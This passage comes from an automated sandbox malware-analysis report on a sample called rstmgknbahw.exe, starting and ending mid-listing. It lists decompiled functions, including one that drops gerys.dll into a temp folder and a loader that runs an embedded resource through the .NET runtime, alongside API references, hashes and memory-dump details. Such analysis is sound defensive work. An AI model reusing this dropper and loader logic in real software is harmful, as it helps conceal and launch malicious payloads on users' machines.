							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

APIs

IsWindowVisible.USER32(?), ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll
API String ID: 427699356-114422824
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming\sspgadrjncoy,00402CC7,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming\sspgadrjncoy,00402CC7,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\AppData\Roaming\sspgadrjncoy, xrefs: 004055BF

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Roaming\sspgadrjncoy
API String ID: 2709904686-2266446683
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rstmgknbahw.exePID: 5320, Parent PID: 4296COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	3.6%
Signature Coverage:	0%
Total number of Nodes:	1564
Total number of Limit Nodes:	15

Executed Functions

Function 00401E1D Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 049E23A0 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a77d9e29744bbc069dd5e14f5c3fa4acc621d96c2401a67ff16f8b8e07be4588
Instruction ID: cc29176f8bde51a2f55704cd40455971ce75e5833bd0d7ceef40367a8df53c65
Opcode Fuzzy Hash: a77d9e29744bbc069dd5e14f5c3fa4acc621d96c2401a67ff16f8b8e07be4588
Instruction Fuzzy Hash: B812DE30A00215CFDB25DF6AC9846BDB7FABB84301F5485BAD015AB295EB74A846DB40

Uniqueness

Uniqueness Score: -1.00%

Function 049E2FA8 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc8395412f00a9714247a6cb8a1696a166433986be21c3e91747b1099ee4d25
Instruction ID: 0c0377bc9807cce791314f438b4b19d94ee92eb02f2d730dc0f814cb606bb8b3
Opcode Fuzzy Hash: fdc8395412f00a9714247a6cb8a1696a166433986be21c3e91747b1099ee4d25
Instruction Fuzzy Hash: D3819E32F011159BD725DB69C884A6EB7F3AFC8311F2A8574E805AB355DE31EC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 049E306F Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ea633e641ee860454ad3e6cd2b182dc0000dc9f0f85000cfa5ba9670cb8f0e
Instruction ID: 50aae82b394a6444db5554a8ce1b5f43ef0a7763f21dd179e1fb952bb9d45459
Opcode Fuzzy Hash: 10ea633e641ee860454ad3e6cd2b182dc0000dc9f0f85000cfa5ba9670cb8f0e
Instruction Fuzzy Hash: C2516B32F015169BD715DB69C884B6EB7E3AFC8311F2AC174E409AB369DE34EC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401489 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v2.0.50727
API String ID: 2372384083-2350909873
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 049E0682 Relevance: 2.7, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Yvq^, xrefs: 049E0702, 049E0707
Zvq^, xrefs: 049E06A1, 049E06A6

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: Zvq^$Yvq^
API String ID: 0-307087882
Opcode ID: fdaf9d5734eb7663d64538bdb3f2d064d695a9519e235469a785db198818b25b
Instruction ID: 3d93dc74643759b41bd763eb2431ae62981e45ea5e310b152a8878b5c3f2fe89
Opcode Fuzzy Hash: fdaf9d5734eb7663d64538bdb3f2d064d695a9519e235469a785db198818b25b
Instruction Fuzzy Hash: F751C131328251CFC715ABB5EC1C2BD3BA7BFC0751B14897AE402CA2B5DE759C029BA1

Uniqueness

Uniqueness Score: -1.00%

Function 049E2D58 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>_kq, xrefs: 049E2DA5
, xrefs: 049E2E76

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: $>_kq
API String ID: 0-1412446344
Opcode ID: 1e0130cf3be974ee7bf6a8d95cd096172e7365b35f984e95a3b0b35d1878df52
Instruction ID: 85aa665a6c3f787c250e84a43133531dda992c6e738b410b5d1befbaf8160b52
Opcode Fuzzy Hash: 1e0130cf3be974ee7bf6a8d95cd096172e7365b35f984e95a3b0b35d1878df52
Instruction Fuzzy Hash: 6841F870F08165CBCB11CF6AC8885BEBB6BEBC4214B24C9BEC416DB645E635F8438751

Uniqueness

Uniqueness Score: -1.00%

Function 049E3B6B Relevance: 1.7, Strings: 1, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>_kq, xrefs: 049E3F9D

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: >_kq
API String ID: 0-4149988037
Opcode ID: fc3eef119669e7df8793534295e97aa73a1fa6d559ee5ef12740d9a3e6c82179
Instruction ID: 80f5d641a18f6d4ae1cefccda19228cb407024303488d2f3c985e6b157e8f55b
Opcode Fuzzy Hash: fc3eef119669e7df8793534295e97aa73a1fa6d559ee5ef12740d9a3e6c82179
Instruction Fuzzy Hash: 9DF18271A00205CFCB16CF59C8849A9FBF6FF89310719CAA5E8099F266D730EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04C70508 Relevance: 1.6, APIs: 1, Instructions: 93
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C704B1

Memory Dump Source

Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: fa4af51b462f23658906262028c66f77828e3989861d30d0d177d6e87cd21828
Instruction ID: 39185def0bbf2fc84c5d8ea2d7aea1817d9dcc9a19ba610fd4264c1de5d5b0aa
Opcode Fuzzy Hash: fa4af51b462f23658906262028c66f77828e3989861d30d0d177d6e87cd21828
Instruction Fuzzy Hash: 9B31C2764057809FE751CF15D885B62BFE4FF06324F0880AADD848F263D375A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A8AA7E Relevance: 1.6, APIs: 1, Instructions: 92
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A8AB2D

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 886e13b95dd9be686bc9409f1f169c791d1ffd276477b9b18c3ec3037bf8b1dc
Instruction ID: fae96809c9eb10a5f98341ee3e0c042d26038d0fe75b804a7762622720a20607
Opcode Fuzzy Hash: 886e13b95dd9be686bc9409f1f169c791d1ffd276477b9b18c3ec3037bf8b1dc
Instruction Fuzzy Hash: C031C2B25443846FE7228B25CC45FA7BFA8EF05720F0884AAED858B152D224E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00A8AB75 Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,427A8738,00000000,00000000,00000000,00000000), ref: 00A8AC30

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6a04c560e63e687e55e3ceba14855ddb3e3081806a053760d1c3c441b2f8e58a
Instruction ID: b8ab514c0e2ac2f4fd3ee12f610d8eda7cc699d1dc6ad46f1af7056078190124
Opcode Fuzzy Hash: 6a04c560e63e687e55e3ceba14855ddb3e3081806a053760d1c3c441b2f8e58a
Instruction Fuzzy Hash: 3A31A4B15097845FE722CF65CC84F52BFF8EF06310F08859AE985CB153D264E949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C70416 Relevance: 1.6, APIs: 1, Instructions: 84
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C704B1

Memory Dump Source

Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 0a05a4d5b556717658638602debe4c94dba1ea35aed1af45de40ff19d648fcf5
Instruction ID: e27a8874a6977477200d0185606a3f088f0924d123c8c37e748d1c50dfe5798a
Opcode Fuzzy Hash: 0a05a4d5b556717658638602debe4c94dba1ea35aed1af45de40ff19d648fcf5
Instruction Fuzzy Hash: CC3173B15097806FE722CF65CC85F56FFE8EF05310F0884AAE9859B292D375E904C765

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B51B Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32 ref: 00A8B5BA

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 46e54ec5ac475c58570c75008ec059c5e8a313874240229bdd4403bfa802781e
Instruction ID: b4ce2786de1300f9e51228eeaa358885af9c1c4311be32f56951c09eccfab674
Opcode Fuzzy Hash: 46e54ec5ac475c58570c75008ec059c5e8a313874240229bdd4403bfa802781e
Instruction Fuzzy Hash: 4431597650E3C05FE7138B25DC50A52BFB4AF07210B0E80DBD885CF1A3D2299909C772

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B080 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 00A8B11A

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 256a167d91259c36ed349bfd0c411101ee368eec03d2d6b6601810c4bfd31e2a
Instruction ID: e998c83fd7aba24bea4104ef5bdd10c3aebdaf08d1b74b94a75f11710ef87252
Opcode Fuzzy Hash: 256a167d91259c36ed349bfd0c411101ee368eec03d2d6b6601810c4bfd31e2a
Instruction Fuzzy Hash: A221A37140D3C16FD3138B258C51B22BFB4EF87620F0A40DBE984CB5A3D229A919C772

Uniqueness

Uniqueness Score: -1.00%

Function 00A8AAAE Relevance: 1.6, APIs: 1, Instructions: 74
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A8AB2D

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b6e8bc2f99c9da76896bdd8d125dca01ba62f32d8a245c01bbca96b6db223868
Instruction ID: 717435175df2626bf72bbce613a05e5fa79074066ce8daa3a08b8172b26c8f75
Opcode Fuzzy Hash: b6e8bc2f99c9da76896bdd8d125dca01ba62f32d8a245c01bbca96b6db223868
Instruction Fuzzy Hash: 84219FB2500704AEE7219F55CC88F6AFBEDEF14720F04845AE9459A641D634E948CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04C7043E Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C704B1

Memory Dump Source

Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: da4f4c06cf2128c3613dea3ba54a947d66a5b40ca17623483a48d8a3aea607a2
Instruction ID: 41c4a15fc02f002846f8cb4b39a7c5e0783f89df2c81a7fde3d202b73c5d3f50
Opcode Fuzzy Hash: da4f4c06cf2128c3613dea3ba54a947d66a5b40ca17623483a48d8a3aea607a2
Instruction Fuzzy Hash: 02217CB1644340AFE721CF6ACC85B66FBE8EF04320F08846AE9459B242E775E504CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00A8ABB6 Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,427A8738,00000000,00000000,00000000,00000000), ref: 00A8AC30

Memory Dump Source

